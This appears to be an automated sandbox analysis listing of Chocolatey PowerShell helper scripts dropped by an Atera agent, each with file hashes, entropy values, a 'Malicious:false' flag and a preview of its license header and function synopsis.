                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyExplorerMenuItem {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Creates a windows explorer context menu item that can be associated with..a command.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyFileAssociation.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3080
                                                                                                                                                                                                                                        Entropy (8bit):5.192518177403395
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKoognbqHdyVO6ckUf1eg9DgH:cSyL+QGXHqgnydyVOQUf1eg9DgH
                                                                                                                                                                                                                                        MD5:44D634D52E391B61FEA2B3311FD130C4
                                                                                                                                                                                                                                        SHA1:AC5184FA6552AD3D2D58EBD53563ED3238E089FF
                                                                                                                                                                                                                                        SHA-256:22FA3870EC2455426BD2BA94B5DC82C241D16F1DBD1AC6979787E947B39563AE
                                                                                                                                                                                                                                        SHA-512:53F5C0D5865DA75816B663CDD4279938401498416A2AD4FD4A7667CC93042D4FBCBC7B2F2F1FD3864CFADBC73908730C6EC7761A77207511861CB277AF8DBF59
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyFileAssociation {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Creates an association between a file extension and a executable......DESCRIPTION..In

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyInstallPackage.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):14313
                                                                                                                                                                                                                                        Entropy (8bit):5.166123502608628
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ctL+QGm9UIirNuMyrnyBOXOrH2ZoBZiLtM+h1yBPSa:ctL+yG9PKQaOyaBEl1+PSa
                                                                                                                                                                                                                                        MD5:7BB19403672F88442C8510579DEEA62B
                                                                                                                                                                                                                                        SHA1:D7685A3C16C53822D696EE3479451BCF1C42860A
                                                                                                                                                                                                                                        SHA-256:FDAE94594F6DDF60874760BC0E8306422681CE7C177BFA811A625AE74363CCAF
                                                                                                                                                                                                                                        SHA-512:8383D42946F02B72676BF3F6016C0CFA9355AE840320354111B8E40CD9567F46B558B4B60809BF6F0B1364A1F84E6815DC04B02D2F42078E0057F1990CCC83A3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyInstallPackage {.. <#...SYNOPSIS..**NOTE:** Administrative Access Required.....Installs software into "Programs and Features". Use..Install-ChocolateyPackage when

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyPackage.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17164
                                                                                                                                                                                                                                        Entropy (8bit):5.102467977763193
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ctL+QG/i9AUaHrN+eNbVPoC8XdI96LMw9lpWo:ctL+jiKUW+eNbVPHMG9Gz
                                                                                                                                                                                                                                        MD5:EF3DA9AA21D97701F975F6E7EC05790D
                                                                                                                                                                                                                                        SHA1:C78F165791049FA3A17218AE2ADEECF79C628E15
                                                                                                                                                                                                                                        SHA-256:917FCEC8CA28B0EF404F565AAECF7FB850E193326D012583927CAA8BB55FB3EC
                                                                                                                                                                                                                                        SHA-512:40C18493196A1395EB72629042E0BE98F19CF657E402FF0F21447A238879157534BBCA632C40B047B42C4EA46C9935D40EF53604DCADB5552B8F6D4A5027C809
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPackage {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Installs software into "Programs and Features" based on a remote file..download. Use Install-

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyPath.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4341
                                                                                                                                                                                                                                        Entropy (8bit):5.172978110813656
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMb4lFkF9lr4cr8QCz7rVgAY+AExSNzwdOq7FuRFu7lVENiz:cSyL+4pGXHFKoETMcePrVnxAExSsl73
                                                                                                                                                                                                                                        MD5:B8FD2F73466C4538F16B753C1707E185
                                                                                                                                                                                                                                        SHA1:DEEAFE9F90676AC71FDC879D856A5FF312AF0D74
                                                                                                                                                                                                                                        SHA-256:1134D81094235B52249BD974129142BCE3B9796387C0D7CE71CE68A909A5C6B6
                                                                                                                                                                                                                                        SHA-512:BE6FCFB5FCBA314D4CE62FB47B3A292AADD6C7FB6723D042FC603211B7DFC20D8E2213132BA0ECF29A00050A0C7640E00FF6638EA499A2C0A33D8FBCFBC004E5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPath {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-PathType 'Machine'.`....This puts a directory to the PATH environment variable......DESCRIPTI

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2645
                                                                                                                                                                                                                                        Entropy (8bit):5.278706654776255
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMD+4RXPXbVSPDqA9FM4jImbO2Poq+:cSyL+4pGXHFKoi7bVSe+M4jImg
                                                                                                                                                                                                                                        MD5:9432BDECB1FAE8A80B302A6216A7615B
                                                                                                                                                                                                                                        SHA1:80C6C8255413A9B9E2BD8DE14B274DFEF1F6E86A
                                                                                                                                                                                                                                        SHA-256:20510B09D631C0E5D9E6E4E5F0FC47EF47C1A413FE3F83A2413A2F4E42E1B649
                                                                                                                                                                                                                                        SHA-512:F6BF39157FB67D7434CCC6F80CF7E13C04302243BE3589D8FF85ECDEA1A19559091BA86FD7BB22671B239F16136ABC8FA84A156477497B32B35E9721EF9B7103
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPinnedTaskBarItem {..<#...SYNOPSIS..Creates an item in the task bar linking to the provided path......NOTES..Does not work with SYSTEM, but does not error. It warns

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyPowershellCommand.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9319
                                                                                                                                                                                                                                        Entropy (8bit):5.106965440646972
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHni8ybOOeHYlqWKWXVWpRXrHoyf4yc0q1:ctL+QG3ij9e4lqZfc1
                                                                                                                                                                                                                                        MD5:D95A27860316FF9415C6E59530A4F83E
                                                                                                                                                                                                                                        SHA1:16CA9BB81AC55A4EE814915F919FCE89634D637D
                                                                                                                                                                                                                                        SHA-256:F6A1CEB186C30AAD003EAE9B71FDEF4D1DC0D989C81FFDD844C5E9B82EF9532D
                                                                                                                                                                                                                                        SHA-512:4FBE61563130EF06FC69C5FEEFAD59A6FB4DF01BCA7C289A9E8E7B3D16B06BE8BB652AAC7DBF5548BCDDB7F9EEFC2E739B707694BF18995C645F4715DD43C1D3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPowershellCommand {..<#...SYNOPSIS..Installs a PowerShell Script as a command.....DESCRIPTION..This will install a PowerShell script as a command on your system. Li

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyShortcut.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7888
                                                                                                                                                                                                                                        Entropy (8bit):5.219559860002251
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXH9mufXMVW7Vb944B6/yS/LIiP8/HahiJqhx8l91b:ctL+QGtmufXBVbwBPi6cJ4x8l91b
                                                                                                                                                                                                                                        MD5:B67CDEF057B2B5376CFDBE1F51AC241E
                                                                                                                                                                                                                                        SHA1:12B3484E2F85D5C591F1DDD178BA71F224BC232B
                                                                                                                                                                                                                                        SHA-256:D09B2B6B3D43259E79E6778581BA884B526D7A0687C90B19F38EF5B0CA1E5752
                                                                                                                                                                                                                                        SHA-512:BDBEC684B46B3039C7C369901C618E4D0313588B4AB3AE3A10C20CA89C9F2CFB24430FF360FA63D813B920088C7CE5DE17C20C193E0F5FBE40495A86212760FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyShortcut {..<#...SYNOPSIS..Creates a shortcut.....DESCRIPTION..This adds a shortcut, at the specified location, with the option to specify..a number of additional p

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyVsixPackage.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8855
                                                                                                                                                                                                                                        Entropy (8bit):5.1654657712280985
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHrDorybOY2W/thNuVwBE6nBEvEGYfpxIDcO:ctL+QGNk67zyYpG7
                                                                                                                                                                                                                                        MD5:B751C9113B9601DC1B66D597F86474E9
                                                                                                                                                                                                                                        SHA1:E69E72AEAC3BBF5E3DE0C307FE62C0D293FCE36E
                                                                                                                                                                                                                                        SHA-256:E821C31B1A2C9CF7BB6AF12BBB70D88DC30ABADCBD68197982A0DCC6EEF7C982
                                                                                                                                                                                                                                        SHA-512:BCA21C385EA43B62CF113D35E3A50A66E69C6CB98BDE874DC38D6B517206456C4B3726825EA962E0F1676FD8ED936C51DD8FE7D85E9C1F3A336FDC961A53A662
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyVsixPackage {..<#...SYNOPSIS..Downloads and installs a VSIX package for Visual Studio.....DESCRIPTION..VSIX packages are Extensions for the Visual Studio IDE. The V

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyZipPackage.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9740
                                                                                                                                                                                                                                        Entropy (8bit):5.124129906660506
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXH5l6ybO41LHHPWUWYhNfhNuVtsYzrPr:ctL+QGJlhXlHvbVPLYzLr
                                                                                                                                                                                                                                        MD5:A9F2320F7C75DB38BA32DE454DB14F41
                                                                                                                                                                                                                                        SHA1:52869D1B9C412DC5AB848E1E363A2F1C043A6EBA
                                                                                                                                                                                                                                        SHA-256:D5C38F705555D2F334308EB27E8CFADA3E1503390A19D99C26810295047815E7
                                                                                                                                                                                                                                        SHA-512:D40A8228A93F7543D1F447BC2989A5A9714F07F6CDE411801659483A0BCE5BD5696B5631DEC89FE6D4C9DDD87F29002A421627C9CF60EC57A6A93E02F028BE85
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyZipPackage {..<#...SYNOPSIS..Downloads file from a url and unzips it on your machine. Use..Get-ChocolateyUnzip when local or embedded file......DESCRIPTION..This wi

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-Vsix.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2178
                                                                                                                                                                                                                                        Entropy (8bit):5.225120339484231
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoM4eAjm3LeoXPNpxdeVP3YJxxKW2W2VlWp:cSyL+4pGXHFKoZjmnP3OVPUxxO3le
                                                                                                                                                                                                                                        MD5:5082284C6F295B50B7C28303E52D2770
                                                                                                                                                                                                                                        SHA1:08D320C56CA725CFC8D558E5C923836EDC369DFD
                                                                                                                                                                                                                                        SHA-256:D488957D7BEFF9256A176E7EA1F6D167604C175B44746B2B86B7EA0480F8089C
                                                                                                                                                                                                                                        SHA-512:F8AB98CD8A14ADFA9FED578867A6188F6CBCA5E4361FC0D17D5BAA49818DF7A24BE94C616A8FE6821B75FDCE853D426464BA8E6CE8824E2A47912F26204A8241
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-Vsix {..<#...SYNOPSIS..DO NOT USE. Not part of the public API......DESCRIPTION..Installs a VSIX package into a particular version of Visual Studio......NOTES..This is not par

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Set-EnvironmentVariable.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4463
                                                                                                                                                                                                                                        Entropy (8bit):5.326623524611151
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKo9LAVZVTfGqqHQ6+MiLMK+SIgEGZkxpU3gZCjfocO:cSyL+QGXHvAVLGqqHQ6waN9A3a
                                                                                                                                                                                                                                        MD5:C5ADB094F8B04B9D9E4E7FA429D0568F
                                                                                                                                                                                                                                        SHA1:64A4EC9D365702E1D279F0958B67EDAAC1CCFF72
                                                                                                                                                                                                                                        SHA-256:A7E60AA5802ADC6E16D105C693819D7B8F5396C9B18BB32D4E55A1C6EDDEE409
                                                                                                                                                                                                                                        SHA-512:20654DDEBFB81F1AA49BBBA3CF9C8BB2A03DA48C1D14DC63F4C200F8374393430E2515D85EE39B3EC788EFD97F8D442F07D36C06595263D57D6FEACA5B9DE152
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Set-EnvironmentVariable {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-Scope 'Machine'.`....DO NOT USE. Not part of the public API. Use..`Install-ChocolateyEnviron

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Set-PowerShellExitCode.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1711
                                                                                                                                                                                                                                        Entropy (8bit):5.130959499082034
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyX54q90AlH31KofO/OuBT0fkaCVYBt4PHU:cSyp4aXHFKozUVYBt4c
                                                                                                                                                                                                                                        MD5:73DCA113BBA352B82F814797A5E075B5
                                                                                                                                                                                                                                        SHA1:B514007F4B97D41584B73A1BFFBE24B37131CCD1
                                                                                                                                                                                                                                        SHA-256:A4F55463BF3258F02058B8A568A4F650B6DEA54BE1E5851C9339D53DBA2CC08F
                                                                                                                                                                                                                                        SHA-512:9F0D8D5B5C418BDBD9034EF8BFEBA20D4F1D99B37F4DE7867102E6486BA6F5BA7D9CB5C34E7D9649546B74E81B6E238EB8CBA8BB458C7A0AFBC975B49ED04011
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....Function Set-PowerShellExitCode {..<#...SYNOPSIS..Sets the exit code for the PowerShell scripts......DESCRIPTION..Sets the exit code as an environment variable that is checked and used..as the exit code for the package at the end of the package script......NOTES..This tells PowerShell that it should prepare to shut down....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16063
                                                                                                                                                                                                                                        Entropy (8bit):5.071535838625921
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXH8SvdSIVLWDL+G3YQwJOm1JzzN566OdHYrZxmrP17OrnwflAflNKc1+R:ctL+QGRvdSIWDznmzzvOUrIWjKEM05q
                                                                                                                                                                                                                                        MD5:C653DD51F0E2EF62BBD7F782C8DAE3AC
                                                                                                                                                                                                                                        SHA1:860325CDDF15E97C487A2351051517C89E414316
                                                                                                                                                                                                                                        SHA-256:120D4F0ECD7D4AF742CCE72D4CE86EBD960F3FC83FBB58860BECD79147830585
                                                                                                                                                                                                                                        SHA-512:417FD7B7609E7F002F8915D0E8EDA8EB3932FE3F4F7D88070457D2B08251CF0063C3B283C2129A02BAD6361812A16CDD1F3DFB26F55043181F9680D8B073B32E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
